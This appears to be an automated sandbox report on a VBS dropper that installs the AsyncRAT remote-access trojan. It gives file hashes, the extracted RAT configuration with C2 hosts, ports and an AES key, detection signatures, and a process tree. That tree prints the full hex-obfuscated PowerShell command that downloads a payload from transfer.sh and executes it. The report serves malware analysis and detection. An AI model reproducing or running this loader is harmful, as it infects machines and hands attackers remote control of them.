Analysis
-
max time kernel
114s -
max time network
145s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
14/08/2021, 06:40
Static task
static1
Behavioral task
behavioral1
Sample
W092.vbs
Resource
win7v20210408
General
-
Target
W092.vbs
-
Size
1KB
-
MD5
eaecbd393f2fffd8522e5d4c7b8b6f7d
-
SHA1
6a9ac84f1c4778cf41ef45b2906919f99a06acf5
-
SHA256
414a79e6c87489cb73e9176e867d554788a28ba86cb4e00f3f8fed15400999bd
-
SHA512
8c24cf0f221c9de102adbfc21f3f762a06b4041963534021ffa7ba4174e149577adb00425066157c9257c3a0f407490754bf58090f8da9096cbe8970b57a42ae
Malware Config
Extracted
http://transfer.sh/1T8qkDx/ko.txt
Extracted
asyncrat
0.5.7B
asyncpc.duckdns.org:6650
asyncpc.duckdns.org:9034
asyncpc.duckdns.org:6890
asyncpc.duckdns.org:7829
13.77.222.211:6650
13.77.222.211:9034
13.77.222.211:6890
13.77.222.211:7829
AsyncMutex_6SI8OkPnk
-
aes_key
PYYzntkVFJfMofAe4qQYi6HmHf8Kj3BT
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
asyncpc.duckdns.org,13.77.222.211
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6650,9034,6890,7829
-
version
0.5.7B
Signatures
-
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
-
Async RAT payload 2 IoCs
resource yara_rule behavioral2/memory/2872-158-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral2/memory/2872-159-0x000000000040D11E-mapping.dmp asyncrat -
Blocklisted process makes network request 1 IoCs
flow pid Process 9 812 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 812 set thread context of 2872 812 powershell.exe 81 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 812 powershell.exe 812 powershell.exe 812 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 812 powershell.exe Token: SeDebugPrivilege 2872 aspnet_regbrowsers.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 748 wrote to memory of 812 748 WScript.exe 73 PID 748 wrote to memory of 812 748 WScript.exe 73 PID 812 wrote to memory of 2872 812 powershell.exe 81 PID 812 wrote to memory of 2872 812 powershell.exe 81 PID 812 wrote to memory of 2872 812 powershell.exe 81 PID 812 wrote to memory of 2872 812 powershell.exe 81 PID 812 wrote to memory of 2872 812 powershell.exe 81 PID 812 wrote to memory of 2872 812 powershell.exe 81 PID 812 wrote to memory of 2872 812 powershell.exe 81 PID 812 wrote to memory of 2872 812 powershell.exe 81
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\W092.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='http://transfer.sh/1T8qkDx/ko.txt';$SOS='24-42-20-3d-27-45-54-48-20-43-4f-49-4e-74-2e-57-54-46-20-43-4f-49-4e-6c-49-4f-53-4e-54-27-2e-52-65-70-6c-61-63-65-28-27-45-54-48-20-43-4f-49-4e-27-2c-27-6e-45-27-29-2e-52-65-70-6c-61-63-65-28-27-54-46-20-43-4f-49-4e-27-2c-27-45-62-43-27-29-2e-52-65-70-6c-61-63-65-28-27-4f-53-27-2c-27-65-27-29-3b-24-43-43-20-3d-20-27-44-4f-53-20-43-4f-49-4e-20-4c-53-4f-53-43-4f-49-4e-6e-47-27-2e-52-65-70-6c-61-63-65-28-27-53-20-43-4f-49-4e-20-27-2c-27-57-6e-27-29-2e-52-65-70-6c-61-63-65-28-27-53-4f-27-2c-27-6f-61-44-27-29-2e-52-65-70-6c-61-63-65-28-27-43-4f-49-4e-27-2c-27-54-72-49-27-29-3b-24-41-20-3d-27-49-60-45-6f-73-20-43-4f-49-4e-60-57-60-42-54-43-20-43-4f-49-4e-6a-60-45-54-48-20-43-4f-49-4e-20-24-42-29-2e-24-43-43-28-24-54-52-55-4d-50-29-27-2e-52-65-70-6c-61-63-65-28-27-6f-73-20-43-4f-49-4e-27-2c-27-58-28-6e-60-65-27-29-2e-52-65-70-6c-61-63-65-28-27-42-54-43-20-43-4f-49-4e-27-2c-27-2d-4f-62-27-29-2e-52-65-70-6c-61-63-65-28-27-54-48-20-43-4f-49-4e-27-2c-27-60-63-60-54-27-29-3b-26-28-27-49-27-2b-27-45-58-27-29-28-24-41-20-2d-4a-6f-69-6e-20-27-27-29-7c-26-28-27-49-27-2b-27-45-58-27-29-3b';Invoke-Expression (-join ($SOS -split '-' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-